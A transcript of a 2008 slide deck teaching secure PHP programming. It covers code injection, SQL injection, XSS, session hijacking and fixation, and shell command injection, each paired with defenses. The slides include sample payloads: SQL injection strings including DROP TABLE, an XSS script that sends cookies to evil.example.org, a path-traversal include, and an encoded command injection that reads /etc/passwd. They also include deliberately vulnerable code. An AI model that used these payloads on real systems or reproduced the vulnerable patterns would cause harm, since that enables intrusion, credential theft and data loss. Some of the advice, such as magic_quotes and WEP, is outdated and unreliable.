php secure programming
TRANSCRIPT
2
Most Secured computer in the
WORLDNo Need to secure the OSNo Need to secure the S/WNo need to do Anything It's Naturally Secured
3
Even No Need to Switch ON
4
Web Security ?PHP ?
5
PHP Mainly for Web Programs
Fact : 1
Fact : 2
Easy To Learn
6
PHP: 20,917,850 domains,
1,224,183 IP addresses
Fact : 3
Fact : 4
More Flexible Functions
7
Few Named threats
Code Injection SQL Injection Cross Site Script (XSS) Session Hijacking Session Fixation Temp Files abuse Remote Execution
More and More unNamed threats...
8
Code Injection
9
Code Injection
Dont directly pass the filenames
$filename = $_REQUEST['message'];$message = file_get_contents($filename);print $message;
This is ok: http://example.com/myscript.php?message=hello.txt
But what if I do like this?:
http://example.com/myscript.php?message=passwords.txt
10
Code Injection
This is especially important for includes, requireand require_once
$module = $_REQUEST['module'];include(“lib/$module”);
This is ok: http://example.com/cms?module=login.php
But what if I do like this?:
http://example.com/cms?module=../passwords.ini
11
Make sure the value is one you expected, if not...ERROR!
$requestedModule = $_REQUEST['module'];switch($requestedModule){ case “login”: $module = “login”; break; case “logout”: $module = “logout”; break; default: $module = “error”;}
Code InjectionDefense
12
SQL Injection
13
Form to user search ....
$username=$_POST['username'];$query= "SELECT * FROM users WHERE name = ' “ .$username." ' ;"
If i give , $username a' or 't'='t
Query will be , "SELECT * FROM users WHERE name = ' a' or 't'='t ';"
SQL Injection
14
If i give , $username a';DROP TABLE users; SELECT * FROM data WHERE name LIKE '%
Query will be ,
SELECT * FROM users WHERE name = ' a';DROP TABLE users; SELECT * FROM data WHERE name LIKE '% ';
SQL Injection
15
Use single quotation
eg: "select * from users where user= '.$username.'"
Check types of user submitted values
is_bool(), is_float(), is_numeric(), is_string(), is_int() , intval() , settype() ,strlen()
eg: strpos($query , ';')
Escape every questionable character in your query ' " , ; ( ) and keywords "FROM", "LIKE", and "WHERE"
mysql_real_escape_string
SQL Injection
Defense
16
magic_quotes_gpc (default – on ) (deprecation – php 6.0)
If Off use addslashes
If On , If you don't needstripslashes
if (get_magic_quotes_gpc()){ $_GET = array_map('stripslashes', $_GET); $_POST = array_map('stripslashes', $_POST); $_COOKIE = array_map('stripslashes', $_COOKIE);
}
SQL Injection
Defense
17
Mysql Improved Extension
$query=mysqli_prepare($connection_string, "select * from user where user= ?"); mysqli_stmt_bind_param($query,"s",$username); mysqli_stmt_execute($query); sstring iinteger ddouble bbinary
PEAR DB, DataObject
SQL Injection
Defense
18
XSS – Cross Site Scripting
19
1.) Inserting scripts
<script>document.location = 'http://evil.example.org/steal_cookies.php?cookies=' + document.cookie</script>
2.) Login 3.) Set Cookies4.) Executes the scripts
XSS
5.) Steals the cookies
20
Remote control of the client browser
Reveal the value of a cookie
Change links on the page
Redirect to another URI
Render a bogus form
or
Any undesirable action ...
XSS
21
XSS Encode HTML Entities in All NonHTML Output htmlentities()
Eg:$str = "A 'quote' is <b>bold</b>";echo htmlentities($str);
Outputs Will be > A 'quote' is <b>bold</b>
Check the image upload URI (avatar, icon) parse_url
Eg: <img src=”http://shopping.example.com/addCart.php?item=123”/>
Show the domain name for User submitted Linkseg. Not safe > Hey click this to see my photo <a href=”http://badguys.net”>Bala</a>
safe > Hey click this to see my photo [badguys.net] Bala
Defense
22
Session Hijacking
23
What is Session ID ?
24
Victim
Attacker
Web Server
Session ID= AD238723FD32
Session Hijacking
25
Victim
Attacker
Web Server
Session ID= AD238723FD32
Session ID= AD238723FD32
Session Hijacking
26
Session Hijacking
Network Eavesdropping Promiscuous Mode
If Intranet ?Use Switch rather than a Hub
If wifi ? WEP Weired Equivalent Privacy If Internet ? SSL
27
Unwitting Exposure
Sending links
See this item http://store.com/items.php?item=0987
it's O.K , if i send like this,
http://store.com/items.php?item=0987&phpsessid=34223
How to Avoid ?
session.use_trans_sid (turned off by default)
session.use_only_cookies (Defaults to 1 (enabled) since PHP 6.0.)
Session Hijacking
28
Victim
Attacker
Web Server
Session Fixation
1.) See this link http://unsafesite?SID=3423
2.) If he clicks, http://unsafesite?SID=3423 3. Shows login page Set SessionID =3423
session_id($_GET['SID'])
4.) Now Full Access http://unsafesite?SID=3423
29
Use SSL.
Use Cookies Instead of $_GET Variables. (ini_set ('session.use_only_cookies',TRUE);
ini_set ('session.use_trans_sid',FALSE); Use Session Timeouts ini_set('session.cookie_lifetime',1200) ini_set('session.gc_maxlifetime) Regenerate IDs for Users with Changed Status session_regenerate_id
Session Hijacking Defense
30
Remote Execution
31
Remote Execution
Injection of Shell commands
<?php$filename=$_GET['filename'];$command='/usr/bin/wc $filename”;$words=shell_exec ($command);print “$filename contains $words words.”;?>
This is ok ...wordcount.php?filename=textfile.txt
But, What if i give like this ...wordcount.php?filename=%2Fdev%2Fnull%20%7C%20cat%20%2Fetc%2Fpasswd
(filename > /dev/null | cat /etc/passwd )/usr/bin/wc /dev/null |cat /etc/passwd
32
Remote Execution
Allow only Trusted , Human Users to Import Code
Store uploads outside of Web Document Root
Limit allowable filename extensions for upload
Use disable_functions directiveeg:
disable_functions= “eval,phpinfo”
Do not include PHP scripts from Remote Servers
eg: <?phpinclude ('http://example.net/code/common.php') ?>
Properly escape all shell commandsescapeshellarg() , escapeshellcmd()
Defense
33
Future? PHP 6.0
Register Globals
Big security hole
Safe Mode
False sense of security
Magic Quotes
Messed with the data
Deprecation
Upcoming changes and featureshttp://www.php.net/~derick/meetingnotes.htmlhttp://www.phphacks.com/content/view/49/33/
Rasmus Lerdorf – PHP 6.0 Wish Listhttp://news.php.net/php.internals/17883
34
What to do?
Proper Input Validation
Dont do Programming + Security
Do secure Programming
htmlentities, mysql_real_escape_string,
parse_url , addslashes ,escapeshellarg,
escapeshellcmd... etc
SSL
Use PEAR , PECL
35
Images From Flickr.com
reference http://flickr.com/photos/opinicus/246099418/remote_boy http://flickr.com/photo_zoom.gne?id=331355695&size=llevel_cross http://flickr.com/photo_zoom.gne?id=67342604&size=oinjection3 http://flickr.com/photos/fleurdelisa/249435636/building game1http://flickr.com/photo_zoom.gne?id=346575350&size=ocomputer_baby1http://flickr.com/photo_zoom.gne?id=102207751&size=ocountry_border1 http://flickr.com/photo_zoom.gne?id=48740674&size=lcomputer_baby http://flickr.com/photo_zoom.gne?id=436594815&size=mhijack http://flickr.com/photo_zoom.gne?id=463129891&size=ldog_security http://flickr.com/photo_zoom.gne?id=2205272682&size=l Id card http://flickr.com/photo_zoom.gne?id=1269802640&size=o
36
Reference
Pro PHP SecurityChris Snyder , Michael Southwell
http://wikipedia.org/
http://www.sitepoint.com/article/phpsecurityblunders
http://phpsec.org/
WWW.google.com
37
38
Copyright (c) 2008 Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.2
or any later version published by the Free Software Foundation.
http://www.gnu.org/copyleft/fdl.html